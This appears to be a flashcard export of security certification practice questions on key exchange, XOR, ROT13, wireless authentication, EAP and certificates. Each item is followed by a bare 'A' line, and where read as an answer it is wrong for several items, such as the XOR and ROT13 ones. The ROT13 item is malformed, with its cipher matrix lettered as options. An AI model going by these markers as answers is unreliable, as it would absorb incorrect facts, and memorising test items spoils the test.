As a security-focused systems designer, you need to select the means by which symmetric keys are generated and exchanged between communication endpoints. Which of the following will provide your product with the most secure solution?
A.	Digital envelopes
B.	Static keys
C.	ECDHE
D.	Sequential keys
A

Q6.13

114
Q
What is the result of the following calculation: 1 0 0 1 0 0 1 1 ⊕ 0 0 0 1 1 1 0 0?
A.	1 0 0 1 1 1 1 1
B.	0 0 0 1 0 0 0 0
C.	0 1 1 1 0 0 0 0
D.	1 0 0 0 1 1 1 1
A

Q6.14

115
Q

Given the ROT13 matrix that follows, what is the plain text of the following cipher text: frphevgl ebpxf?
A. PT: A B C D E F G H I J K L M N O P Q R S T U V W X Y Z
B. CT: N O P Q R S T U V W X Y Z A B C D E F G H I J K L M
C. Windows rules
D. Security rocks
E. Ephemeral crypto
F. Cracking keys

A

Q6.15

116
Q
What form of wireless can use a RADIUS server to authenticate a wireless client?
A.	WEP
B.	WPA PSK
C.	WPA-2 ENT
D.	WPS
A

Q6.16

117
Q
What form of EAP is considered one of the strongest options, negotiates security using digital certificates similar to HTTPS, and can function over wireless connections?
A.	EAP-FAST
B.	EAP-SIM
C.	PEAP
D.	EAP-TLS
A

Q6.17

118
Q

You are the manager of a restaurant and want to offer your customers wireless connectivity to the Internet. You are concerned that non-patrons will abuse the system and you therefore want to limit access to paying customers. Which of the following solutions would be able to accomplish this?
A. Use an open WiFi network with a hidden SSID.
B. Use a captive portal requiring a code that is provided to customers just after they place their drink order.
C. Post a sign on the wall with the WiFi name and password.
D. Track the MAC addresses of each wireless user and block those that abuse the system.

A

Q6.18

119
Q
You are implementing a new web server for your organization. There have been issues in the past with hackers impersonating your site in order to harm your clients and visitors. What certificate-based tool can be used to reduce the risk of site impersonation?
A.	Pinning
B.	Stapling
C.	Key escrow
D.	Offline CA
A

Q6.19

120
Q
What type of certificate will enable an organization to verify six specific subdomains with a single certificate but not allow other subdomains to be included?
A.	Wildcard
B.	SAN
C.	Root
D.	Domain validation
A

Q6.20